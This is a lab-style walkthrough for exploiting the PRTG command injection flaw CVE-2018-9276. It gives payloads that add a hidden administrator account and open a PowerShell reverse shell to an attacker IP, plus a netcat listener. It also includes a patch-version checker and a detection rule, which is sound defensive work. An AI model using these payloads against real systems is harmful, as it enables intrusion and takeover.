# enumeration

### Introduction

This section details how to exploit PRTG Network Monitor through CVE-2018-9276, an authenticated command injection vulnerability in its notification feature. The following steps guide the exploitation process:

***

### 1. Discovery and Enumeration

#### Nmap Scan

Use Nmap to scan all TCP ports and identify service versions:

```bash
sudo nmap -sV -p- --open -T4 10.129.201.50
```

Look for port `8080` reporting `Indy httpd 17.3.33.2830 (Paessler PRTG bandwidth monitor)`.

#### EyeWitness Scan

EyeWitness recognises the PRTG login page in its screenshot report and lists the product's default credentials (`prtgadmin:prtgadmin`).

#### cURL Version Check

Retrieve the PRTG version from the web page's source code:

```bash
curl -s http://10.129.201.50:8080/index.htm -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" | grep version
```
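As an added example (not part of the original walkthrough), the version string the curl step returns can be parsed and compared against the 18.2.39 fix release, so an inventory of PRTG hosts can be checked for the patch in one pass. The HTML sample is constructed and its exact markup is an assumption; only the four-part version number matters to the parser.

```python
import re

# Release in which Paessler fixed CVE-2018-9276 (the page states builds before
# 18.2.39 are affected). Only the first three fields are compared.
FIXED_VERSION = (18, 2, 39)

# Constructed sample of a PRTG index page. The surrounding markup is an assumption;
# the version number matches the banner nmap showed on the page.
SAMPLE_INDEX_HTML = """
<!DOCTYPE html>
<html><head><title>Welcome | PRTG Network Monitor (HOST)</title></head>
<body>
<div class="footer"><span class="prtgversion">&nbsp;PRTG Network Monitor 17.3.33.2830 </span></div>
</body></html>
"""

# PRTG versions look like major.minor.build.revision
VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\.(\d+)\b")


def extract_version(html):
    """Return the first four-part PRTG version in the page as a tuple of ints, or None."""
    m = VERSION_RE.search(html)
    if m is None:
        return None
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version):
    """True when the build predates the 18.2.39 fix release."""
    return version[:3] < FIXED_VERSION


def audit(html):
    """Summarise one host: the version seen and whether it still needs the patch."""
    v = extract_version(html)
    if v is None:
        return {"version": None, "status": "unknown"}
    return {
        "version": ".".join(map(str, v)),
        "status": "patch required" if is_vulnerable(v) else "ok",
    }


if __name__ == "__main__":
    print(audit(SAMPLE_INDEX_HTML))
```

Feed it the body of the `curl` response instead of the constructed sample; a host whose page carries no version string is reported as `unknown` rather than silently treated as patched.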

***

### 2. Exploiting CVE-2018-9276 (Authenticated Command Injection)

#### Login

Log in with the default credentials or with credentials found during enumeration (here `prtgadmin:Password123`).

#### Navigate to Notifications

* Go to **Setup** -> **Account Settings** -> **Notifications** in the PRTG web interface.

#### Add a New Notification

1. Click **Add new notification**.
2. Name the notification (e.g., `pwn`).
3. Scroll down and check **EXECUTE PROGRAM**.
4. In **Program File**, select `Demo exe notification - outfile.ps1`.
5. In the **Parameter** field, enter the command injection payload:

```plaintext
test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add
```

6. Click **Save**.

#### Test Notification

* On the Notifications page, click the **Test** button for the newly created notification.
* A popup will say **EXE notification is queued up**.

***

### 3. Verification

#### Using CrackMapExec (SMB)

Check if the new user has local admin access:

```bash
sudo crackmapexec smb 10.129.201.50 -u prtgadm1 -p Pwn3d_by_PRTG!
```

#### Alternative Verification Methods

* Try logging in via **RDP**, **WinRM**, or using:
  * `evil-winrm`
  * `wmiexec.py`
  * `psexec.py` (from the Impacket toolkit)

***

### 4. Reverse Shell (Alternative Payload)

Instead of adding a user, execute a PowerShell reverse shell:

```plaintext
test.txt;powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

#### Start Netcat Listener

On your attack machine:

```bash
nc -lvp 4444
```
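From the defender's side, both payloads on this page (the user-creation string in section 2 and the reverse shell above) travel the same path: the PRTG probe starts `powershell.exe` with the notification script and the unsanitised **Parameter** string on its command line. The following detection logic is added here and is not part of the original walkthrough; it scans Sysmon-style process-creation events for that pattern. The probe image name, the script location under `Notifications\EXE` and the exact `powershell.exe` invocation are assumptions about a default install, and the log lines are constructed (the two malicious parameter strings are the ones shown on this page).

```python
import json
import re

# Assumed default-install paths (not taken from the page).
SCRIPT = r"C:\Program Files (x86)\PRTG Network Monitor\Notifications\EXE\Demo exe notification - outfile.ps1"
PROBE = r"C:\Program Files (x86)\PRTG Network Monitor\PRTG Probe.exe"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def _event(parent, image, params):
    """Build a constructed Sysmon Event ID 1 record; the -File form is an assumption."""
    return {"EventID": 1, "ParentImage": parent, "Image": image,
            "CommandLine": f'powershell.exe -File "{SCRIPT}" {params}'}


# Constructed JSON-lines log: one benign notification, the two payloads from the
# page, and an unrelated PowerShell launch that the rule must ignore.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    _event(PROBE, PWSH, "test.txt"),
    _event(PROBE, PWSH, "test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;"
                        "net localgroup administrators prtgadm1 /add"),
    _event(PROBE, PWSH, "test.txt;powershell -c \"$client = New-Object "
                        "System.Net.Sockets.TCPClient('10.10.14.15',4444);"
                        "$sendback = (iex $data 2>&1 | Out-String)\""),
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PWSH,
     "CommandLine": "powershell.exe -NoProfile Get-Date"},
])

PRTG_PARENT = re.compile(r"\\PRTG (Probe|Server)\.exe$", re.I)
NOTIFICATION_SCRIPT = re.compile(r'\\Notifications\\EXE\\[^"]*\.ps1"?\s*', re.I)
# The demo script expects a single file name; a ';' followed by more text means
# a second command was smuggled into the Parameter field.
CHAINED = re.compile(r";\s*\S")
INDICATORS = [
    ("local account creation", re.compile(r"\bnet1?(\.exe)?\s+user\b.*\s/add\b", re.I)),
    ("administrators group change", re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\b", re.I)),
    ("outbound socket from notification", re.compile(r"Sockets\.TCPClient", re.I)),
    ("dynamic code execution", re.compile(r"\b(iex|Invoke-Expression)\b", re.I)),
]


def notification_parameter(event):
    """Return the argument string handed to a PRTG EXE notification script, or None
    when the event is not powershell.exe started by the PRTG probe for such a script."""
    if not PRTG_PARENT.search(event.get("ParentImage", "")):
        return None
    if not event.get("Image", "").lower().endswith("powershell.exe"):
        return None
    m = NOTIFICATION_SCRIPT.search(event.get("CommandLine", ""))
    if m is None:
        return None
    return event["CommandLine"][m.end():]


def analyse(event):
    """Return an alert dict for a suspicious notification launch, else None."""
    params = notification_parameter(event)
    if params is None:
        return None
    findings = []
    if CHAINED.search(params):
        findings.append("chained command in notification parameter")
    findings += [name for name, rx in INDICATORS if rx.search(params)]
    if not findings:
        return None
    return {"parent": event["ParentImage"], "parameter": params, "findings": findings}


def scan_log(text):
    """Run the rule over JSON-lines process-creation events; one alert per hit."""
    alerts = []
    for line in text.splitlines():
        if line.strip():
            alert = analyse(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(", ".join(a["findings"]), "->", a["parameter"][:60])
```

The chained-command check alone is the high-value signal: a legitimate EXE notification passes a single argument, so any `;` after it is worth an alert regardless of which indicator regex fires. Pair the process-creation rule with Windows Security events 4720 (account created) and 4732 (member added to a local group) occurring minutes after a PRTG notification test, and with outbound connections whose parent chain leads back to the probe.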

***

### Key Points

* **Replace** `10.129.201.50` with the target IP address.
* **Modify** `10.10.14.15:4444` to match your attacker's IP and port.
* **Use semicolons (;)** to separate commands in the payload.
* **Ensure the target PRTG version is vulnerable** (before `18.2.39`).
* **PowerShell execution policies** may block scripts; consider bypass techniques.
* **Always test on systems where you have explicit permission.**
